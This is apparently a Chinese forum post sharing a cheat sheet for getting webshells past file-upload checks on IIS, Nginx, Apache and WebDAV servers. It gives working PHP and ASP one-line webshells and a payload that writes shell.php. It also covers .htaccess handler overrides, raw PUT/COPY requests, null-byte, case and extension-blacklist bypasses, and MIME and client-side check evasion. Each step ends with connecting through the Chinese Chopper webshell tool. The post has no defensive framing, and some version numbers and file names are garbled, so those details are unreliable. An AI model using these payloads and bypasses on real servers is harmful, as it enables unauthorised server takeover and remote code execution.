先上图,由于太大复制麻烦我分两次贡献出来吧。废话不多说了,直接上正文
1、IIS解析漏洞
1、目录解析(IIS6.0):建立*.asa 、*.asp格式的文件夹时,其目录下的文件都被当做IIS当做
ASP文件来解析(*.asp/1.jpg目录解析)
其中88.asp下的88.jpg文件会当成asp解析
1、文件解析(IIS6.0):当文件为*.asp;1.jpg文件名畸形解析 ,IIS6.0一样把文件当成asp解析
原理:分号后面的不解析。
还有IIS6.0 默认的可执行文件除了asp还包含这三种:
/aspdama.asa
/aspdama.cer
/aspdama.cdx
二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞: Nginx解析漏洞这个伟大的漏洞是我国安全组织发现的。 在默认Fast-CGI开启状况下,黑阔上传一个名字为aspdama.jpg,内容为:
<?PHPfputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
的文件,然后访问aspdama.jpg/.php,在这个目录下就会生成一句话木马 shell.php
三、Nginx <8.03 空字节代码执行漏洞: 影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 Nginx在图片中嵌入PHP代码然后通过访问
phpmuma.jpg�.php
来执行其中的代码! 四、Apache解析漏洞: Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断. 比如 phpmuma.php.owf.rar “.owf”和”.rar”这两种后缀是apache不可识别解析,apache就会把phpmuma.php.owf.rar解析成php. 如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个phpmuma.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀! 五、其他 在windows环境下,dama.jpg[空格] 或dama.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单,若上传成功,空格和点都会被windows自动消除,这样也可以getshell。 如果在Apache中、htaccess可被执行、且可被上传、那可以尝试在、htaccess中写入:
<FilesMatch "phpmuma.jpg">SetHandler application/x-httpd-php </FilesMatch>
然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。
webDAV:一种基于HTTP1.1的通信协议,配合HTTP不安全方法
可以上传webshell
步骤一抓包上传
PUT /a.txt HTTP/1.1
HOST:
<%eval request (“mima”%)>
步骤二复制文件到指定文件夹(或者直接用move将a.txt修改成shell.asp)
COPY /a.txt HTTP 1.1
HOST:
Destination:http://www.baidu.com/cmd/cmd.asp
例子: IIS扩展名解析漏洞
l 上传yijuhua.php,拦截数据包
l 在文件目录处uploadimg改为uploadimg/1.php;
l Yijuhua.php后缀名改为yijuhua.jpg
例子: IIS目录路径解析
l 将yijuhua.asp后缀名修改为yijuhua.jpg上传
l 上传时拦截数据包
l 在文件目录处uploadimg改为uploadimg/1.asp/
2、Apache解析漏洞
原理:
解析的时候碰到不认识的扩展名,会一直向前解析,知道碰到认识的扩展名
,如果都不认识,则会暴漏源代码
例如
1.php.xx.Yy.bb,他会一直解析到认识的php为止,
2.rar.bb.cc,若都不认识,会解析源代码。
例子:Apache扩展名解析漏洞
打开站点,将x.php后缀名修改为x.php.7z,上传x.php.7z,
上传成功,上传成功后使用中国菜刀进行连接
3、PHP CGI解析漏洞
Nginx上的漏洞
例子:
http://www.baidu.com/1.jgp/2.php
2.php文件是不存在的,1.jpg会当成php代码解析
例子:nginx解析漏洞
l 打开站点,将dama.php(大马)后缀名修改为x.jpg,上传x.jpg,上传成功
l 打开dama.jpg链接(在x.jpg后面加./php)
l 如,http://10.10.10.135:82/nginxjiexi/uploadimg/x.jpg/.php
4、绕过客户端检测
例子:
打开burpsuit,开启代理服务器,再打开站点,拦截数据包(修改本地的JavaScript)
l if(str != ".jpg" && str != ".jpeg"&&str != ".JPG" && str != ".JPEG" )修改为:
l if(str != ".jpg" && str != ".jpeg"&&str != ".JPG" && str !=".JPEG"&&str!=”.php” ),forward
l 上传yijuhua.php,上传成功
l 用中国菜刀连接yijuhua.php,查看实验现象
5、绕过MIME文件类型检测
打开站点,打开burpsuit,开启服务器代理,上传yijuhua.php,拦截数据包将MIME类型:Content-Type: application/octet-stream修改为Content-Type: image/pjpeg,上传成功,使用中国菜刀连接
上传yijuhua.php,拦截数据包:
6、绕过文件内容检测
例子:
打开站点,打开burpsuit,开启服务器代理,上传1.jpg照片,拦截数据包,在数据包中1.jpg修改为1.php,在图片数据的末尾空几个空格粘贴一句话木马的内容,上传,上传成功后使用中国菜刀进行连接
8、黑名单绕过
例子:IIS黑名单绕过
l 将yijuhua.php后缀名改为yijuhua.PHP(文件重命名就可以),上传到站点,上传成功,用中国菜刀连接yijuhua.PHP
l 将xx.asa上传至站点,上传成功,打开xx.asa所在链接写入一句话木马,用中国菜刀进行连接
例子:Apache黑名单绕过
l 将dama.php后缀名改为dama.phP,上传到站点,上传成功后访问木马所在的链接或使用中国菜刀进行连接
l 上传yijuhua.php时使用burpSuite进行抓包,将yijuhua.php后缀名后面加上空格,或者改成php3、上传到站点,上传成功,使用中国菜刀进行连接
9、白名单绕过
例子:截断目录路径(IIS)
l 将uploadfiles/修改为uploadfiles/1.php .jpg(php后有空格),filename处yijuhua.php后缀名修改为yijuhua.jpg
l 在buirpsuit的row一栏中,修改空格20(1.php .jpg中的空格)的值改为00.(大概在30行左右)后上传
l 修改完后可以看到UploadFiles/1.php .jpg变为
l 上传后使用中国菜刀进行连接
例子: 截断扩展名(IIS)
l 将yijuhua.php后缀名修改为yijuhua.jpg,上传,拦截数据包
l 在filename处的yijuhua.jpg修改为yijuhua.php (空格).jpg
l 在buirpsuit的row一栏中,修改空格20的值为00(大概在30行左右)
l 修改完可以看到yijuhua.php .jpg变为,上传成功后用中国菜刀进行连接
例子:只能上床.DOC的文件
用明小子的动力上传
提交的地址:是打开页面的地址,不是referer字段里的地址
10、其他方法绕过
例子:利用.htaccess绕过
l 打开站点,上传.htaccess文件,上传成功
l 将dama.php后缀名修改为dama.jpg,上传,上传成功
l 打开dama.jpg所在链接
例子: 双文件上传漏洞
l 打开burpsuir,开启服务器代理,再打开站点拦截数据包
<formaction="Upfile_B.asp" method="post" name="form1"onSubmit="return check()" enctype="multipart/form-data">
<inputname="FileName" type="FILE"size="30">
<inputtype="submit" name="Submit" value="上传"style="border:1px double rgb(88,88,88);font:9pt">
<inputname="PhotoUrlID" type="hidden" id="PhotoUrlID"value="6">
加一行文件名按钮,name标签不一致
<input name="FileName2"type="FILE" size="30">
修改后
<formaction="Upfile_B.asp" method="post" name="form1"onSubmit="return check()" enctype="multipart/form-data">
<input name="FileName" type="FILE"class="tx1" size="30">
<inputname="FileName2" type="FILE"size="30">
<inputtype="submit" name="Submit" value="上传"style="border:1px double rgb(88,88,88);font:9pt">
<inputname="PhotoUrlID" type="hidden" id="PhotoUrlID"value="6">
l 上传,第一个文件上传图片,第二个文件上传一句话木马,上传成功
l 用中国菜刀连接第二个文件一句话木马
l 通过源代码可以查看到上传的地址
11、IIS可PUT上传
主要是webDav没有做过滤,允许一些不安全的HTTP方法
密码是888,
总结
还有部分下次发
没啥好总结的,放在电脑里好久的文档了,发出来贡献给大家,发出来希望能让大家有所收获,当然如果你愿意帮忙补齐是更好不过了
